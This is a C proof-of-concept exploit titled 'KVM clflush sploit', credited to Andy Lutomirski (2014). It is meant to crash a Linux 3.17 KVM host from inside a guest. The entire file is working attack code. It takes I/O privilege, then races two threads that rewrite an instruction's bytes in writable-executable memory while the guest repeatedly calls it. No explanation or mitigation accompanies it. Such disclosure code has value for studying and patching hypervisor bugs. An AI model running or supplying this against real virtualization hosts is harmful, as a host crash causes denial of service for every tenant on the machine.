// KVM clflush sploit (crashes a Linux 3.17 host) // Copyright (c) 2014 Andy Lutomirski #include <pthread.h> #include <err.h> #include <stdio.h> #include <stdint.h> #include <signal.h> #include <setjmp.h> #include <string.h> #include <stdbool.h> #include <sys/io.h> asm (".pushsection .wtext, \"awx\"\n" "badcode:\n\t" "clflush (%rip)\n\t" "ret\n" ".popsection"); extern volatile unsigned short badcode[]; static void *proc(void *ignored) { while (true) badcode[0] = 0xae0f; return NULL; } int main() { if (iopl(3) != 0) err(1, "iopl"); pthread_t pth; pthread_create(&pth, NULL, proc, NULL); while (true) { badcode[0] = 0x00e4; asm volatile ("call badcode" : : : "ax", "flags"); } }